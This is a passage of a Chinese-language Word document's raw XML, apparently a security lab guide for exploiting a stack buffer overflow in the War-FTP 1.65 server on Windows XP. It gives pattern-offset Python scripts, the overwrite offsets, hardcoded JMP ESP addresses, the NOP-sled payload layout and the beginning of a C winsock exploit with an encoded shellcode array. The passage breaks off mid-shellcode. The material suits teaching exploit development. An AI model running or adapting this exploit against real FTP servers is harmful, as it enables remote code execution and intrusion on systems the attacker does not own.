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A2C18" w14:textId="051D7D03" w:rsidR="0074759A" w:rsidRDefault="0074759A" w:rsidP="0074759A">
      <w:pPr>
        <w:pStyle w:val="a7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351A1FE7" w14:textId="57519A81" w:rsidR="0074759A" w:rsidRDefault="0074759A" w:rsidP="0074759A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D2E0D" w14:textId="4F9E4562" w:rsidR="0074759A" w:rsidRDefault="0074759A" w:rsidP="0074759A">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在虚拟机</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WindowsXP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olldbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开war-ftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.65，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>degug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，允许匿名登录；在另一台机器使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuteftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录，用户名使用依次增加的“AAA…”,当用户名长度超过480时，war-ftp 1.65出现异常甚至崩溃退出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A12C77" w14:textId="5CE3BB64" w:rsidR="0074759A" w:rsidRDefault="0074759A" w:rsidP="0074759A">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（正常情况）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D17DF" w14:textId="094DB036" w:rsidR="00E975A3" w:rsidRPr="00E975A3" w:rsidRDefault="0074759A" w:rsidP="00E975A3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40F530B8" wp14:editId="5C680235">
            <wp:extent cx="5274310" cy="2287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3-11_2218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AE21" w14:textId="48CB872D" w:rsidR="0074759A" w:rsidRDefault="0074759A" w:rsidP="0074759A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得缓冲区大小和定位溢出点ret位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430DA296" w14:textId="3AF0D759" w:rsidR="0074759A" w:rsidRDefault="0074759A" w:rsidP="0074759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先生成随机不重复的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44824F11" w14:textId="4B720E67" w:rsidR="0074759A" w:rsidRDefault="008159EC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生成随机不重复的字符串的</w:t>
      </w:r>
      <w:r w:rsidR="0074759A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例代码（Python）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CD8D81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num = input("请输入需要的长度：");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA47A2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num = int(num)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235AED6A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252D3FF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getstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(num):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9BCB54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outstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D452B8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0,26):    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11764AC4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j in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">0,26):        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021F0697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0,10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4C89F8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outstr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]+b[j]+c[k]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4255FB5D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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) &gt; num):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7798EA89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return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="406A7C1C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</w:p>
    <w:p w14:paraId="50281F34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outstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(num)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E41F059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with open("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str.txt","w</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AD8A1" w14:textId="32AE53BC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f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[:num])  #这句话自</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>带文件</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>关闭功能，不需要再写</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f.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72A9EC4C" w14:textId="03DA7E01" w:rsidR="00133FE4" w:rsidRDefault="0019552E" w:rsidP="0019552E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidR="00133FE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将字符串送给F</w:t>
      </w:r>
      <w:r w:rsidR="00133FE4">
        <w:t>TP</w:t>
      </w:r>
      <w:r w:rsidR="00133FE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，查看此时堆栈的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D27C66" w14:textId="086FD296" w:rsidR="00133FE4" w:rsidRDefault="00133FE4" w:rsidP="00133FE4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52791C44" wp14:editId="27E7F35C">
            <wp:extent cx="5152381" cy="2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3-11_222230溢出情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1771" w14:textId="77777777" w:rsidR="008159EC" w:rsidRDefault="00133FE4" w:rsidP="00133FE4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724B8C0" w14:textId="77777777" w:rsidR="008159EC" w:rsidRDefault="008159EC" w:rsidP="008159EC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、获得溢出堆栈中的字符串值，计算其对应的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66382732" w14:textId="0BA27B18" w:rsidR="0074759A" w:rsidRDefault="008159EC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#判断字符串位置的</w:t>
      </w:r>
      <w:r w:rsidR="0074759A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例代码（python）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C937F22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str = input("请输入字符串：");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71812D51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a="ABCDEFGHIJKLMNOPQRSTUVWXYZ"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B460E9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b="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abcdefghijklmnopqrstuvwxyz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F66E16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c="0123456789"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA189C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outstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BEF19C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0,26):    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3047DED1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 j in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>range(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">0,26):        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503BB60A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0,10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A219739" w14:textId="77777777" w:rsidR="0019552E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outstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> += a[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">]+b[j]+c[k]   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7220E837" w14:textId="70A4B78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</w:p>
    <w:p w14:paraId="09DB7C26" w14:textId="5B51EAAC" w:rsidR="0019552E" w:rsidRDefault="0019552E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#字符串为A</w:t>
      </w:r>
      <w:r>
        <w:t>SCII</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码的情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18992556" w14:textId="78D03376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ostr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A23E4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(str),</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0,-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7FBEE4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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(str[i-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2:i</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>],16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CAFB3C" w14:textId="77777777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ostr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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BF6A9" w14:textId="0B31AADC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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ostr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C027F2B" w14:textId="3B9AC815" w:rsidR="0074759A" w:rsidRDefault="0074759A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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>outstr.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ostr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFAB388" w14:textId="1D5A4FD0" w:rsidR="0019552E" w:rsidRDefault="0019552E" w:rsidP="008159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#如果为字符串，可以直接</w:t>
      </w:r>
      <w:r>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>outstr.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(str))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98DD34" w14:textId="77777777" w:rsidR="008159EC" w:rsidRDefault="008159EC" w:rsidP="008159EC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆栈内容为：E</w:t>
      </w:r>
      <w:r>
        <w:t>IP 32714131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>4A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>q，EB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">P </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056AF60D" w14:textId="77777777" w:rsidR="008159EC" w:rsidRDefault="008159EC" w:rsidP="008159EC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分别对应的位置为：</w:t>
      </w:r>
      <w:r>
        <w:t>EIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为指令指针寄存器，对应字符串位置为4</w:t>
      </w:r>
      <w:r>
        <w:t>85</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；E</w:t>
      </w:r>
      <w:r>
        <w:t>SP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顶，位置为4</w:t>
      </w:r>
      <w:r>
        <w:t>93</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,；E</w:t>
      </w:r>
      <w:r>
        <w:t>BP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基地址，位置为5</w:t>
      </w:r>
      <w:r>
        <w:t>81</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5671B" w14:textId="433AA362" w:rsidR="00353A20" w:rsidRPr="008159EC" w:rsidRDefault="00353A20"/>
    <w:p w14:paraId="6B1F9C24" w14:textId="6A2AB2A9" w:rsidR="00EA7E70" w:rsidRDefault="008159EC" w:rsidP="008159EC">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>设计构造Exploit的结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AEF9FA" w14:textId="77777777" w:rsidR="00B839DD" w:rsidRDefault="00F172E2" w:rsidP="00B839DD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>伪装指令的格式为：“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">USER </w:t>
      </w:r>
      <w:r w:rsidR="00B839DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(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string</w:t>
      </w:r>
      <w:r w:rsidR="00B839DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) \</w:t>
      </w:r>
      <w:r w:rsidR="00B839DD">
        <w:t>r\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B839DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0C2C11" w14:textId="60C033FE" w:rsidR="00B839DD" w:rsidRPr="00041278" w:rsidRDefault="00B839DD" w:rsidP="00B839DD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00041278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>这里的重点之一是寻找组成注入向量的跳转地址：如果选择ESP为跳转的寄存器，则需要JMP ESP的指令地址，使用failwest在《软件漏洞分析入门_6_初级shellcode_定位缓冲区》提出的代码，在中文Windows系统核心dll中查找，找到XP user32.dll的JMP ESP:0x77d7c5fb, XP kernel32.dll的JMP ESP:0x7c834d7b，此外可以使用中文WIN 2K/XP/2003下通用的JMP ESP：0x7ffa4512;如果选择EBP为跳转的寄存器，则需要JMP EBP的指令地址，这可以使用中文WIN 2K/XP/2003下通用的JMP EBP：0x7ffa4967。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2843C910" w14:textId="0CC2E7EC" w:rsidR="00B839DD" w:rsidRDefault="00B839DD" w:rsidP="00B839DD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00041278">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>重点之二是构造攻击代码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>为了防止在执行shellcode之前程序乱跳，所以使用NOP（0X90）指令来进行预防，只要shellcode位置对，最终一定能够执行shellocode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7743B4" w14:textId="01887341" w:rsidR="00A579B7" w:rsidRDefault="00B839DD" w:rsidP="001B5F24">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据获得的位置，</w:t>
      </w:r>
      <w:r w:rsidR="001B5F24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用跳转到ESP执行shellcode，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计Exploit的格式为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FBCC58" w14:textId="68D4173C" w:rsidR="00B839DD" w:rsidRDefault="00605EFA" w:rsidP="00D05065">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDB7841" wp14:editId="62015984">
            <wp:extent cx="5274310" cy="669290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1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A50D74F5-A5F5-4C11-8DA2-F3E8E8F1CC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A50D74F5-A5F5-4C11-8DA2-F3E8E8F1CC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3CE2D1" w14:textId="1CF91988" w:rsidR="00B839DD" w:rsidRDefault="00B839DD" w:rsidP="001B5F24">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00C54ECB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>以命令USER紧跟一个空格开头，后接485个NOP空转指令，紧接着的4个字节用JMP ESP地址如“\x12\x45\xfa\x7f”来填充(这是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5F24">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>x86系统是little-endian方</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54ECB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>式)，之后4字节继续用NOP填充，然后从第4</w:t>
      </w:r>
      <w:r w:rsidR="00A26BD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>93</w:t>
      </w:r>
      <w:r w:rsidRPr="00C54ECB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>字节开始把shellcode复制过去，最后以\r\n表示FTP USER命令结束。攻击时,发生缓冲溢出，CPU根据EIP的地址跳转到堆栈第493字节开始的ESP执行shellcode。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6CE8DC" w14:textId="2BEB71FE" w:rsidR="00B839DD" w:rsidRPr="00C54ECB" w:rsidRDefault="001B5F24" w:rsidP="001B5F24">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>程序实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D62F941" w14:textId="53C32C54" w:rsidR="00B839DD" w:rsidRDefault="00B839DD" w:rsidP="001B5F24">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>根据用户的选择，构造溢出字符串;根据用户提供的数据，使用Socket，使用connect连接目标主机；向目标主机发送溢出字符串（send）；关闭连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BE01AA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#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E52BEC3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#include &lt;winsock.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CF6D0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#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A455756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61346CE9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char exploit[2000];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33430B59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char str[1000];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1733F8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const  char jum_esp[]="\x12\x45\xfa\x7f";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B317461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char cc[]="AAAA";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A8B6C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char scode[]=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD39470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"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F25D3C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"\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x51\x5a\x6a\x4a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFAAC0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"\x58\x30\x42\x30\x50\x41\x6b\x41\x41\x5a\x42\x32\x41\x42\x32\x42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59766D6D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"\x41\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x7a\x49\x79\x6c\x69"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F50DB18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"\x78\x51\x54\x57\x70\x43\x30\x63\x30\x4c\x4b\x67\x35\x45\x6c\x6e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF20228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"\x6b\x71\x6c\x66\x65\x43\x48\x55\x51\x5a\x4f\x4e\x6b\x70\x4f\x42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E499B97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"\x38\x4c\x4b\x43\x6f\x51\x30\x56\x61\x78\x6b\x30\x49\x4c\x4b\x76"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E2A848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"\x54\x4c\x4b\x65\x51\x7a\x4e\x66\x51\x6b\x70\x5a\x39\x6e\x4c\x4d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E7D03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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "\x54\x4f\x30\x73\x44\x56\x67\x68\x41\x5a\x6a\x66\x6d\x44\x41\x6a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EED866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"\x62\x58\x6b\x48\x74\x65\x6b\x72\x74\x31\x34\x77\x74\x74\x35\x79"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F081B9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"\x75\x6c\x4b\x73\x6f\x67\x54\x64\x41\x7a\x4b\x62\x46\x6e\x6b\x64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AD4051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"\x4c\x30\x4b\x6e\x6b\x33\x6f\x75\x4c\x37\x71\x48\x6b\x6e\x6b\x57"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3889406A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"\x6c\x4c\x4b\x77\x71\x58\x6b\x4c\x49\x61\x4c\x56\x44\x47\x74\x69"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0478E5F2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"\x53\x70\x31\x4b\x70\x45\x34\x4c\x4b\x31\x50\x64\x70\x6f\x75\x49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1A3AAC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"\x50\x52\x58\x36\x6c\x4c\x4b\x43\x70\x64\x4c\x4e\x6b\x74\x30\x45"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249B671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"\x4c\x4c\x6d\x4e\x6b\x63\x58\x33\x38\x6a\x4b\x47\x79\x4c\x4b\x4d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E904B6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"\x50\x68\x30\x37\x70\x73\x30\x53\x30\x6e\x6b\x35\x38\x55\x6c\x53"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46669707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"\x6f\x47\x41\x6a\x56\x73\x50\x52\x76\x4b\x39\x7a\x58\x4f\x73\x6b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BCCA5F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"\x70\x63\x4b\x76\x30\x42\x48\x31\x6e\x78\x58\x78\x62\x62\x53\x62"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAC8EC1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"\x48\x7a\x38\x4b\x4e\x4f\x7a\x66\x6e\x30\x57\x69\x6f\x38\x67\x61"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FED5FB3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"\x73\x50\x6d\x55\x34\x66\x4e\x33\x55\x73\x48\x35\x35\x61\x30\x54"</w:t>
      </w:r>
    </w:p>
